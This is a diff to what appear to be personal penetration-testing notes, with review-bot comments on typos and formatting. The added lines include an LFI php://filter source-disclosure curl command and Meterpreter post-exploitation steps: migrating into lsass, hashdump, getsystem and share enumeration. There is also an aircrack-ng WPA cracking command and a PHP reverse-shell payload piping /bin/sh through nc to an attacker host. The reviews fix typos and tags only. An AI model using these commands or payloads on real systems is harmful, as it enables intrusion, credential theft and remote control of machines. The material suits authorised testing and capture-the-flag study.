bump
parent
e89be67148
commit
b65298a98c
|
@ -30,4 +30,9 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
|
||||||
```HTTP
|
```HTTP
|
||||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||||
```
|
```
|
||||||
|
### Base64 Encoding via PHP
|
||||||
|
* Circumvent filter via encoding local files included ins a GET parameter value
|
||||||
|
```http
|
||||||
|
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
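Review bot: the new "Base64 Encoding via PHP" bullet reads "included ins a GET parameter value"; fix the typo to "in a GET parameter value". The added curl URL is also the only one in this file left unquoted: the existing line 30 wraps its URL in single quotes, and an unquoted `?` and the `<fileOnServer>` placeholder are interpreted by the shell, so quote it the same way, e.g. `curl 'http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php'`. The fence around that curl command is tagged `http` (and the existing fences above it `HTTP`); since the content is a shell command, tag it `sh` like the rest of the notes. One sentence on why the wrapper matters from the defensive side would help readers: `php://filter` lets an include disclose source instead of executing it, so a file-inclusion finding with this wrapper is a source-disclosure issue even where direct inclusion would only show rendered output.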
@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec
|
||||||
```
|
```
|
||||||
|
|
||||||
## Post Exploitation
|
## Post Exploitation
|
||||||
* Windows
|
|
||||||
* `load kiwi`
|
* `load kiwi`
|
||||||
* `hashdump`
|
* `load python`
|
||||||
|
* Windows
|
||||||
|
* list SAM database
|
||||||
|
```sh
|
||||||
|
migrate <lsass.exe-PID>
|
||||||
|
hashdump
|
||||||
|
```
|
||||||
|
* enum shares
|
||||||
|
```sh
|
||||||
|
post/windows/gather/enum_shares
|
||||||
|
```
|
||||||
* Linux
|
* Linux
|
||||||
* `use post/linux/gather/hashdump`
|
* `use post/linux/gather/hashdump`
|
||||||
|
|
||||||
|
## Other Meterpreter stuff
|
||||||
|
* Staged and in disguise running as another servicename
|
||||||
|
```
|
||||||
|
getpid
|
||||||
|
ps
|
||||||
|
```
|
||||||
|
* Attempt to elevate privileges
|
||||||
|
```sh
|
||||||
|
getsystem
|
||||||
|
```
|
||||||
|
* Use `multi/handler` or exploit and get an overview via `show payloads`
|
||||||
|
* UserID via `getuid`
|
||||||
|
|
|
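Review bot: the "enum shares" block lists the bare module path `post/windows/gather/enum_shares` while the Linux entry in the same hunk is written as `use post/linux/gather/hashdump`; pick one convention (either `use <module>` followed by `run`, or `run <module>`) so the two sections read the same. The fence around `getpid` / `ps` in "Other Meterpreter stuff" is untagged while the neighbouring fences use `sh`; tag it for consistency. The bullet "Staged and in disguise running as another servicename" does not say what the two commands show; something like "check which process the session lives in" (`getpid`, then locate that PID in `ps`) states the purpose. Finally, the reorganisation moves `hashdump` out of the top-level list into the "list SAM database" block, but the top-level list now contains `load python` with no explanation of what it is for; add a short note or drop it, since every other item here has a purpose attached.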
@ -0,0 +1,20 @@
|
||||||
|
# aircrack-ng
|
||||||
|
|
||||||
|
## airmon-ng
|
||||||
|
|
||||||
|
* Monitor on interface
|
||||||
|
```sh
|
||||||
|
airmon-ng start <interface>
|
||||||
|
```
|
||||||
|
|
||||||
|
## airodump-ng
|
||||||
|
* Capture traffic
|
||||||
|
|
||||||
|
|
||||||
|
## aircrack-ng
|
||||||
|
* Use captured network traffic to crack
|
||||||
|
* Specify targets via common options
|
||||||
|
* Create hashcap files as `HCCAPX` or `HCCAP`
|
||||||
|
```sh
|
||||||
|
aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
|
||||||
|
```
|
|
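Review bot: the "## airodump-ng / Capture traffic" section in the new aircrack-ng.md has no command under it, unlike the airmon-ng and aircrack-ng sections, so the file is incomplete as added; either fill in the capture invocation or mark the section as TODO. In the aircrack-ng section, "Create hashcap files" should read "hashcat files", and the bullet names both `HCCAPX` and `HCCAP` while the command only shows `-j`; state which flag produces which format (`-j` writes HCCAPX, upper-case `-J` writes the older HCCAP) so the reader does not have to guess. "Specify targets via common options" is also too vague to act on; the command line already shows `-b <bssidFromCapture>`, so say that the BSSID selects the network from the capture and drop the generic sentence.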
@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")'
|
||||||
* `ssh-keygen`
|
* `ssh-keygen`
|
||||||
* copy priv key and `chmod 600`
|
* copy priv key and `chmod 600`
|
||||||
* `cat id_rsa.pub > authorized_keys` on target
|
* `cat id_rsa.pub > authorized_keys` on target
|
||||||
|
|
||||||
|
## As Code
|
||||||
|
### PHP
|
||||||
|
```sh
|
||||||
|
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
|
||||||
|
```
|
||||||
|
|
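Review bot: the fence around the PHP one-liner under "### PHP" is tagged `sh`, but the content is a `<?php ... ?>` file, so it should be tagged `php`; the `sh` tag elsewhere in these notes marks commands typed into a shell, and mis-tagging this block makes it look like something to paste at a prompt. The `## As Code` heading would also benefit from a one-line introduction saying these are payload files to be written to disk rather than interactive commands, since the preceding section (`ssh-keygen`, `chmod 600`, `authorized_keys`) is a step list of shell actions and the register changes without warning.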